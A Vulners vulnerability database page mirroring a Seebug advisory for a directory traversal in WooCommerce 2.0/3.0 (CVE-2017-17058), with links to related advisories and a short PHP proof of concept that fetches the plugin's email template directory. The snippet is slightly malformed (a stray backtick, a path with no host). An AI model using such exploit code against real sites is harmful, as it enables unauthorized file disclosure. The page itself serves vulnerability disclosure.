Lucene search
K

WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal(CVE-2017-17058)

🗓️ 01 Dec 2017 00:00:00Reported by KnownsecType 
seebug
 seebug
🔗 www.seebug.org👁 41 Views

WooCommerce 2.0/3.0 Directory Traversal CVE-2017-1705

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress WooCommerce 2.0/3.0 Plugin - Directory Traversal Vulnerability
1 Dec 201700:00
zdt
CNVD
WordPress WooCommerce Plugin Directory Traversal Vulnerability
1 Dec 201700:00
cnvd
CVE
CVE-2017-17058
29 Nov 201707:00
cve
Cvelist
CVE-2017-17058
29 Nov 201707:00
cvelist
NVD
CVE-2017-17058
29 Nov 201707:29
nvd
Packet Storm
WordPress WooCommerce 2.0 / 3.0 Directory Traversal
30 Nov 201700:00
packetstorm
Prion
Directory traversal
29 Nov 201707:29
prion
Positive Technologies
PT-2017-14691 · Automattic · Woocommerce
29 Nov 201700:00
ptsecurity
Vulnrichment
CVE-2017-17058
29 Nov 201707:00
vulnrichment

                                                $woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);

$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://".$woo);

echo $result;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2017 00:00Current
1Low risk
Vulners AI Score1
EPSS0.42903
41